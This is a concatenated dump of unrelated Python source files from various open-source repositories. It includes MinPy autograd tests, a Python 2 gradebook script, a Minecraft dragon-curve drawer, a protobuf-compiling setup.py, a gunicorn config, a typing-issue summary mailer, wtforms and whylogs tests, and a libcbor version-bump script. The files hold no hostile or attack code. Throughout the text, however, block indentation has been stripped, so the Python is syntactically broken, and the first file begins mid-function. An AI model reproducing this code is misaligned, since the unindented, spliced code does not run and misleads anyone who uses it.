# test NumPy
start = time.time()
out, cache = rnn_step_forward(x, h, Wx, Wh, b)
dx, dprev_h, dWx, dWh, db = rnn_step_backward(dnext_h, cache)
out *= dnext_h # to agree with MinPy calculation
end = time.time()
print("NumPy total time elapsed:", end - start)
print()
print("Result Check:")
print('dx error: ', rel_error(dx, grad_arrays[0]))
print('dprev_h error: ', rel_error(dprev_h, grad_arrays[1]))
print('dWx error: ', rel_error(dWx, grad_arrays[2]))
print('dWh error: ', rel_error(dWh, grad_arrays[3]))
print('db error: ', rel_error(db, grad_arrays[4]))
def test_zero_input_grad():
def foo1(x):
return 1
bar1 = grad(foo1)
assert bar1(0) == 0.0
def test_reduction():
def test_sum():
x_np = np.array([[1, 2], [3, 4], [5, 6]])
x_grad = np.array([[1, 1], [1, 1], [1, 1]])
def red1(x):
return mp.sum(x)
def red2(x):
return mp.sum(x, axis=0)
def red3(x):
return mp.sum(x, axis=0, keepdims=True)
grad1 = grad(red1)
assert np.all(grad1(x_np).asnumpy() == x_grad)
grad2 = grad(red2)
assert np.all(grad2(x_np).asnumpy() == x_grad)
grad3 = grad(red3)
assert np.all(grad3(x_np).asnumpy() == x_grad)
def test_max():
x_np = np.array([[1, 2], [2, 1], [0, 0]])
x_grad1 = np.array([[0, 1], [1, 0], [0, 0]])
x_grad2 = np.array([[0, 1], [1, 0], [1, 1]])
x_grad3 = np.array([[0, 1], [1, 0], [0, 0]])
def red1(x):
return mp.max(x)
def red2(x):
return mp.max(x, axis=1)
def red3(x):
return mp.max(x, axis=1, keepdims=True)
def red4(x):
return mp.max(x, axis=0)
def red5(x):
return mp.max(x, axis=0, keepdims=True)
grad1 = grad(red1)
assert np.all(grad1(x_np).asnumpy() == x_grad1)
grad2 = grad(red2)
assert np.all(grad2(x_np).asnumpy() == x_grad2)
grad3 = grad(red3)
assert np.all(grad3(x_np).asnumpy() == x_grad2)
grad4 = grad(red4)
assert np.all(grad4(x_np).asnumpy() == x_grad3)
grad5 = grad(red5)
assert np.all(grad5(x_np).asnumpy() == x_grad3)
def test_min():
x_np = np.array([[1, 2], [2, 1], [0, 0]])
x_grad1 = np.array([[0, 0], [0, 0], [1, 1]])
x_grad2 = np.array([[1, 0], [0, 1], [1, 1]])
x_grad3 = np.array([[0, 0], [0, 0], [1, 1]])
def red1(x):
return mp.min(x)
def red2(x):
return mp.min(x, axis=1)
def red3(x):
return mp.min(x, axis=1, keepdims=True)
def red4(x):
return mp.min(x, axis=0)
def red5(x):
return mp.min(x, axis=0, keepdims=True)
grad1 = grad(red1)
assert np.all(grad1(x_np).asnumpy() == x_grad1)
grad2 = grad(red2)
assert np.all(grad2(x_np).asnumpy() == x_grad2)
grad3 = grad(red3)
assert np.all(grad3(x_np).asnumpy() == x_grad2)
grad4 = grad(red4)
assert np.all(grad4(x_np).asnumpy() == x_grad3)
grad5 = grad(red5)
assert np.all(grad5(x_np).asnumpy() == x_grad3)
test_sum()
test_max()
test_min()
if __name__ == "__main__":
test_autograd()
test_zero_input_grad()
test_reduction()
|
pymoo/model/repair.py | gabicavalcante/pymoo | 762 | 12799621 | <filename>pymoo/model/repair.py
from abc import abstractmethod
class Repair:
"""
    This class allows repairing individuals after crossover, if necessary.
"""
def do(self, problem, pop, **kwargs):
return self._do(problem, pop, **kwargs)
@abstractmethod
def _do(self, problem, pop, **kwargs):
pass
class NoRepair(Repair):
"""
A dummy class which can be used to simply do no repair.
"""
def do(self, problem, pop, **kwargs):
return pop |
recipes/Python/543261_grade_keeper/recipe-543261.py | tdiprima/code | 2,023 | 12799634 | #! /usr/bin/python
# keep record of grades. Made by <NAME>. 0.1-PUBLIC
# NOTE! All letter answers are to be written in quotes (including dates)!
print """############################################
# Welcome to Gradebook! v 0.1 #
# YOUR LIGHT WEIGHT SCHOOL RECORD MANAGER! #
############################################"""
subject = raw_input("What is your assignment's subject? ")
# ^^This asks your class subject; assigns it to 'subject'; and is used later.
date = input('What is the date for your assignment? ')
# ^^This is pretty much the same: but asks the date.
amount = input('What is the number of questions? (NOTE: make all numbers from now on decimals, e.g. "5.0") ')
# ^^^This is also the same, but make the number a DECIMAL!
correct = input('How many questions did you get correct? ')
# ^^^The same... make all DECIMALS!
calc = divmod(correct, amount)
# divmod(correct, amount) returns the (quotient, remainder) pair; assigns it to 'calc'
calcx = (correct / amount)
# divides correct by amount; assigns to 'calcx'
text = "***%s*** \n %s | %d out of %d | %s or %s \n" % (date, subject, correct, amount, calc, calcx)
# creates what will be in your file. assigns to 'text'
print text
# prints what it will put in your file (or append).
fle = raw_input('What should I name the file to put the above data into? ')
# prompts for a filename
A = input('Do you want this to be appended to an existing file? ')
# decides to either append,or to create new file. assigns answer to 'A'
print 'Thanks! appending to file... '
if A == 'yes': #if you answered yes:
fyl = open(fle, 'a')
# the phrase 'fyl' is used to combine open('fle, 'a') with future commands
fyl.write(text)
# the command assigned to 'fyl' writes your data to the filename you said.
fyl.close()
# closes the file; job is done.
elif A == 'no': # if you said no, this will happen:
fyl = open(fle, 'w')
# same as before, but saves the file (see the 'w' instead of 'a'?)
fyl.write(text)
# same
fyl.close()
# same
else: # and if nothing was valid...
print 'Error! Invalid transaction! '
# ...error message!
print 'Done!'
# says it is done
raw_input("Press <RETURN> to quit.")
# makes you type <enter> to quit.
|
mcpipy/dragoncurve.py | wangtt03/raspberryjammod | 338 | 12799657 | #
# Code by <NAME> and under the MIT license
#
from mineturtle import *
import lsystem
t = Turtle()
t.pendelay(0)
t.turtle(None)
t.penblock(block.BRICK_BLOCK)
# ensure angles are always integral multiples of 90 degrees
t.gridalign()
rules = {'X':'X+YF+', 'Y':'-FX-Y'}
def go():
# draw a wall segment with a door
t.pendown()
t.penblock(block.BRICK_BLOCK)
t.startface()
for i in range(4):
t.go(4)
t.pitch(90)
t.endface()
t.penup()
t.go(2)
t.pendown()
t.penblock(block.AIR)
t.pitch(90)
t.go(1)
t.penup()
t.pitch(180)
t.go(1)
t.pitch(90)
t.go(2)
dictionary = { '+': lambda: t.yaw(90),
'-': lambda: t.yaw(-90),
'F': lambda: go() }
lsystem.lsystem('FX', rules, dictionary, 14)
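# Worked example of the rules above (added note): starting from the axiom 'FX',
# one rewrite gives 'FX+YF+', a second gives 'FX+YF++-FX-YF+', and so on; after
# 14 iterations the terminal F/+/- symbols drive the go()/yaw() callbacks in
# `dictionary`, tracing the dragon curve out of wall segments.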
|
test/run/t418.py | timmartin/skulpt | 2,671 | 12799678 | # lists
print "\nlists"
print min([1,2,3,4])
print min([2,1],[1,2],[1,1],[1,1,0])
# tuples
print "\ntuples"
print min((1,2,3,4))
print min((2,1),(1,2),(1,1),(1,1,0))
# dictionaries
print "\ndictionaries"
print min({1:2,3:4,5:6})
print min({1:6,3:4,5:2})
|
kvs/client/python/setup.py | saurav-c/fluent | 1,164 | 12799755 | <gh_stars>1000+
from distutils.core import setup
import os
from setuptools.command.install import install
class InstallWrapper(install):
def run(self):
# compile the relevant protobufs
self.compile_proto()
# Run the standard PyPi copy
install.run(self)
# remove the compiled protobufs
self.cleanup()
def compile_proto(self):
# compile the protobufs
os.system('cd anna && protoc -I=../../../../include/proto --python_out=. ' +
'kvs.proto')
os.system('cd anna && protoc -I=../../../../include/proto --python_out=. ' +
'functions.proto')
def cleanup(self):
os.system('rm anna/kvs_pb2.py')
setup(
name='Anna',
version='0.1',
packages=['anna', ],
license='Apache v2',
long_description='Client for the Anna KVS',
install_requires=['zmq', 'protobuf'],
cmdclass={'install': InstallWrapper}
)
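# Installation sketch (assumptions: protoc is on PATH and the proto sources
# referenced by compile_proto exist at ../../../../include/proto):
#
#   cd kvs/client/python && python setup.py install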
|
kqueen/gunicorn.py | LaudateCorpus1/kqueen | 140 | 12799761 | <filename>kqueen/gunicorn.py
from kqueen.config import current_config
from prometheus_client import multiprocess
import multiprocessing
import os
app_config = current_config()
bind = "{host}:{port}".format(
host=app_config.get('KQUEEN_HOST'),
port=app_config.get('KQUEEN_PORT'),
)
timeout = 180
workers = multiprocessing.cpu_count() * 2 + 1
worker_class = 'gthread'
# check for prometheus settings
if 'prometheus_multiproc_dir' not in os.environ:
raise Exception('Variable prometheus_multiproc_dir is required')
def child_exit(server, worker):
multiprocess.mark_process_dead(worker.pid)
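# Usage sketch (hedged; <wsgi_app> is a placeholder for kqueen's WSGI entry
# point, and prometheus_multiproc_dir must point at a writable directory):
#
#   prometheus_multiproc_dir=/tmp/prom gunicorn -c kqueen/gunicorn.py <wsgi_app>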
|
examples/management/get_user.py | ZygusPatryk/amqpstorm | 140 | 12799812 | <gh_stars>100-1000
from amqpstorm import management
if __name__ == '__main__':
# If using a self-signed certificate, change verify=True to point at your CA bundle.
# You can disable certificate verification for testing by passing in verify=False.
API = management.ManagementApi('https://rmq.amqpstorm.io:15671', 'guest',
'guest', verify=True)
API.user.create('my_user', 'password')
# Get a user
print(API.user.get('my_user'))
# User that does not exist throws an exception
API.user.delete('my_user')
try:
API.user.get('NOT_FOUND')
except management.ApiError as why:
if why.error_code == 404:
print('User not found')
|
boost/libs/iterator/doc/generate.py | randolphwong/mcsema | 1,155 | 12799824 | <reponame>randolphwong/mcsema<filename>boost/libs/iterator/doc/generate.py
#!/usr/bin/python
# Copyright <NAME> 2004. Use, modification and distribution is
# subject to the Boost Software License, Version 1.0. (See accompanying
# file LICENSE_1_0.txt or copy at http://www.boost.org/LICENSE_1_0.txt)
#
# Generate html, TeX, and PDF versions of all the source files
#
import os
import sys
from syscmd import syscmd
from sources import sources
if 0:
for s in sources:
syscmd('boosthtml %s' % s)
else:
extensions = ('html', 'pdf')
if len(sys.argv) > 1:
extensions = sys.argv[1:]
all = [ '%s.%s' % (os.path.splitext(s)[0],ext)
for ext in extensions
for s in sources
]
print 'make %s' % ' '.join(all)
syscmd('make %s' % ' '.join(all))
|
dev/tools/docs/run_doctests.py | awillats/brian2 | 674 | 12799828 | <gh_stars>100-1000
import os
import sphinx
os.chdir('../../../docs_sphinx')
sphinx.main(['sphinx-build', '-b', 'doctest', '.', '../docs', '-D',
'exclude_patterns=reference'])
|
src/modules/catalog/domain/services.py | Ermlab/python-ddd | 308 | 12799846 | # from seedwork.domain.services import DomainService
# from seedwork.domain.value_objects import UUID
# from .entities import Listing, Seller
# from .repositories import ListingRepository
# from .rules import (
# ListingMustBeInDraftState,
# SellerMustBeEligibleForAddingNextListing,
# )
# class CatalogService:
# def publish_listing(self, listing: Listing, seller: Seller):
# self.check_rule(ListingMustBeInDraftState(listing.status))
# self.check_rule(SellerMustBeEligibleForAddingNextListing(seller))
# listing.publish()
|
vit/formatter/start_remaining.py | kinifwyne/vit | 179 | 12799856 | from vit.formatter.start import Start
class StartRemaining(Start):
def format_datetime(self, start, task):
return self.remaining(start)
|
scripts/typing-summary.py | AlexWaygood/typing | 1,145 | 12799864 | <gh_stars>1000+
#!/usr/bin/env python3
"""
Generate a summary of last week's issues tagged with "topic: feature".
The summary will include a list of new and changed issues and is sent each
Monday at 0200 CE(S)T to the typing-sig mailing list. Due to limitations
with GitHub Actions, the mail is sent from a private server, currently
maintained by @srittau.
"""
from __future__ import annotations
import datetime
from dataclasses import dataclass
from typing import Any, Iterable, Sequence
import requests
ISSUES_API_URL = "https://api.github.com/repos/python/typing/issues"
ISSUES_URL = "https://github.com/python/typing/issues?q=label%3A%22topic%3A+feature%22"
ISSUES_LABEL = "topic: feature"
SENDER_EMAIL = "Typing Bot <<EMAIL>>"
RECEIVER_EMAIL = "<EMAIL>"
@dataclass
class Issue:
number: int
title: str
url: str
created: datetime.datetime
user: str
pull_request: bool = False
def main() -> None:
since = previous_week_start()
issues = fetch_issues(since)
new, updated = split_issues(issues, since)
print_summary(since, new, updated)
def previous_week_start() -> datetime.date:
today = datetime.date.today()
return today - datetime.timedelta(days=today.weekday() + 7)
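# Example (added note): if today is Wednesday 2023-05-17 (weekday() == 2), this
# returns 2023-05-17 - timedelta(days=2 + 7) = 2023-05-08, the Monday of the
# previous week.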
def fetch_issues(since: datetime.date) -> list[Issue]:
"""Return (new, updated) issues."""
j = requests.get(
ISSUES_API_URL,
params={
"labels": ISSUES_LABEL,
"since": f"{since:%Y-%m-%d}T00:00:00Z",
"per_page": "100",
"state": "open",
},
headers={"Accept": "application/vnd.github.v3+json"},
).json()
assert isinstance(j, list)
return [parse_issue(j_i) for j_i in j]
def parse_issue(j: Any) -> Issue:
number = j["number"]
title = j["title"]
url = j["html_url"]
created_at = datetime.datetime.fromisoformat(j["created_at"][:-1])
user = j["user"]["login"]
pull_request = "pull_request" in j
assert isinstance(number, int)
assert isinstance(title, str)
assert isinstance(url, str)
assert isinstance(user, str)
return Issue(number, title, url, created_at, user, pull_request)
def split_issues(
issues: Iterable[Issue], since: datetime.date
) -> tuple[list[Issue], list[Issue]]:
new = []
updated = []
for issue in issues:
if issue.created.date() >= since:
new.append(issue)
else:
updated.append(issue)
new.sort(key=lambda i: i.number)
updated.sort(key=lambda i: i.number)
return new, updated
def print_summary(
since: datetime.date, new: Sequence[Issue], changed: Sequence[Issue]
) -> None:
print(f"From: {SENDER_EMAIL}")
print(f"To: {RECEIVER_EMAIL}")
print(f"Subject: Opened and changed typing issues week {since:%G-W%V}")
print()
print(generate_mail(new, changed))
def generate_mail(new: Sequence[Issue], changed: Sequence[Issue]) -> str:
if len(new) == 0 and len(changed) == 0:
s = (
"No issues or pull requests with the label 'topic: feature' were opened\n"
"or updated last week in the typing repository on GitHub.\n\n"
)
else:
s = (
"The following is an overview of all issues and pull requests in the\n"
"typing repository on GitHub with the label 'topic: feature'\n"
"that were opened or updated last week, excluding closed issues.\n\n"
"---------------------------------------------------\n\n"
)
if len(new) > 0:
s += "The following issues and pull requests were opened last week: \n\n"
s += "".join(generate_issue_text(issue) for issue in new)
s += "\n---------------------------------------------------\n\n"
if len(changed) > 0:
s += "The following issues and pull requests were updated last week: \n\n"
s += "".join(generate_issue_text(issue) for issue in changed)
s += "\n---------------------------------------------------\n\n"
s += (
"All issues and pull requests with the label 'topic: feature'\n"
"can be viewed under the following URL:\n\n"
)
s += ISSUES_URL
return s
def generate_issue_text(issue: Issue) -> str:
s = f"#{issue.number:<5} "
if issue.pull_request:
s += "[PR] "
s += f"{issue.title}\n"
s += f" opened by @{issue.user}\n"
s += f" {issue.url}\n"
return s
if __name__ == "__main__":
main()
|
tests/fields/test_integer.py | Ennkua/wtforms | 1,197 | 12799900 | from tests.common import DummyPostData
from wtforms.fields import IntegerField
from wtforms.form import Form
class F(Form):
a = IntegerField()
b = IntegerField(default=48)
def test_integer_field():
form = F(DummyPostData(a=["v"], b=["-15"]))
assert form.a.data is None
assert form.a.raw_data == ["v"]
assert form.a() == """<input id="a" name="a" type="number" value="v">"""
assert form.b.data == -15
assert form.b() == """<input id="b" name="b" type="number" value="-15">"""
assert not form.a.validate(form)
assert form.b.validate(form)
form = F(DummyPostData(a=[], b=[""]))
assert form.a.data is None
assert form.a.raw_data == []
assert form.b.data is None
assert form.b.raw_data == [""]
assert not form.validate()
assert len(form.b.process_errors) == 1
assert len(form.b.errors) == 1
form = F(b=9)
assert form.b.data == 9
assert form.a._value() == ""
assert form.b._value() == "9"
form = F(DummyPostData(), data=dict(b="v"))
assert form.b.data is None
assert form.a._value() == ""
assert form.b._value() == ""
assert not form.validate()
assert len(form.b.process_errors) == 1
assert len(form.b.errors) == 1
|
misc/update_version.py | andyjgf/libcbor | 283 | 12799909 | import sys, re
from datetime import date
version = sys.argv[1]
release_date = date.today().strftime('%Y-%m-%d')
major, minor, patch = version.split('.')
def replace(file_path, pattern, replacement):
updated = re.sub(pattern, replacement, open(file_path).read())
with open(file_path, 'w') as f:
f.write(updated)
# Update changelog
SEP = '---------------------'
NEXT = f'Next\n{SEP}'
changelog_header = f'{NEXT}\n\n{version} ({release_date})\n{SEP}'
replace('CHANGELOG.md', NEXT, changelog_header)
# Update Doxyfile
DOXY_VERSION = 'PROJECT_NUMBER = '
replace('Doxyfile', DOXY_VERSION + '.*', DOXY_VERSION + version)
# Update CMakeLists.txt
replace('CMakeLists.txt',
'''SET\\(CBOR_VERSION_MAJOR "0"\\)
SET\\(CBOR_VERSION_MINOR "7"\\)
SET\\(CBOR_VERSION_PATCH "0"\\)''',
f'''SET(CBOR_VERSION_MAJOR "{major}")
SET(CBOR_VERSION_MINOR "{minor}")
SET(CBOR_VERSION_PATCH "{patch}")''')
# Update Sphinx
replace('doc/source/conf.py',
"""version = '.*'
release = '.*'""",
f"""version = '{major}.{minor}'
release = '{major}.{minor}.{patch}'""")
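# Typical invocation (assumed; run from the repository root so the relative
# paths above resolve, with the new version as the only argument):
#
#   python misc/update_version.py 0.8.0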
|
tests/component/test_performance_log_dataframe.py | cswarth/whylogs | 603 | 12799916 | <filename>tests/component/test_performance_log_dataframe.py
import cProfile
import json
import os
import pstats
from logging import getLogger
from shutil import rmtree
from time import sleep
from typing import List
import pandas as pd
import pytest
from whylogs.app.config import SessionConfig, WriterConfig
from whylogs.app.session import session_from_config
script_dir = os.path.dirname(os.path.realpath(__file__))
TEST_LOGGER = getLogger(__name__)
def count_features(json_profile_filename):
if not os.path.isfile(json_profile_filename):
raise ValueError(f"{json_profile_filename} is not a json file but trying to open it to count features")
profile = get_json_profile(json_profile_filename)
if profile and profile.get("columns"):
return len(profile["columns"].keys())
return 0
def get_json_profile(json_profile_filename):
profile = {}
if os.path.exists(json_profile_filename) and os.stat(json_profile_filename).st_size > 0:
with open(json_profile_filename) as profile_file:
profile = json.load(profile_file)
return profile
def assert_all_elements_equal(data: List):
if not data or len(data) == 1:
return True
first = data[0]
for element in iter(data):
assert first[0] == element[0], f"Found differing feature counts: {first[0]} vs {element[0]} in files {first[1]} and {element[1]}"
@pytest.mark.load
def test_log_rotation_concurrency(tmpdir):
log_rotation_interval = "1s"
sleep_interval = 2
test_path = tmpdir.mkdir("log_rotation_concurrency_repro")
writer_config = WriterConfig("local", ["json"], test_path.realpath(), filename_template="dataset_summary-$dataset_timestamp")
# Load the full lending club 1000 csv, to get a chance at hitting the bug.
csv_path = os.path.join(script_dir, "lending_club_1000.csv")
full_df = pd.read_csv(csv_path)
# full_df has shape (1000, 151) so create a test df with 4x size by iteratively appending to self 2 times
for _ in range(2):
full_df = full_df.append(full_df)
TEST_LOGGER.info(f"test dataframe has shape {full_df.shape}")
# Create a whylogs logging session
session_config = SessionConfig("project", "pipeline", writers=[writer_config])
session = session_from_config(session_config)
TEST_LOGGER.info(f"Running rotate log test with {log_rotation_interval} flush intervals and {sleep_interval}s pause")
profiler = cProfile.Profile()
profiler.enable()
with session.logger(tags={"datasetId": "model-1"}, with_rotation_time=log_rotation_interval) as ylog:
ylog.log_dataframe(full_df) # Log a larger dataframe to increase chance of rotation before seeing all columns
sleep(sleep_interval)
ylog.log_dataframe(full_df.head(n=2)) # Log a smaller dataframe to get more features before rotation
sleep(sleep_interval)
profiler.disable()
stats = pstats.Stats(profiler).sort_stats("cumulative")
TEST_LOGGER.info(stats.print_stats(10))
output_files = []
for root, subdir, file_names in os.walk(test_path):
if not file_names:
continue
if subdir:
for directory in subdir:
for file in file_names:
full_file_path = os.path.join(root, directory, file)
output_files += [full_file_path]
else:
for file in file_names:
full_file_path = os.path.join(root, file)
output_files += [full_file_path]
assert len(output_files) > 0, "No output files were generated during stress test"
TEST_LOGGER.debug(f"Generated {len(output_files)} dataset summary files.")
feature_counts = []
for filename in output_files:
feature_count = count_features(filename)
if feature_count > 0:
feature_counts.append((count_features(filename), filename))
assert len(feature_counts) > 0, f"feature counts are all empty, we expect some empty files with aggressive log rotation but not all empty!"
TEST_LOGGER.info(f"Feature counts all same, first file with features was {feature_counts[0]}")
TEST_LOGGER.debug(f"There were {len(feature_counts)} files with features.")
assert_all_elements_equal(feature_counts)
rmtree(test_path, ignore_errors=True)
TEST_LOGGER.debug(f"End cleaning up test directory {test_path}")
|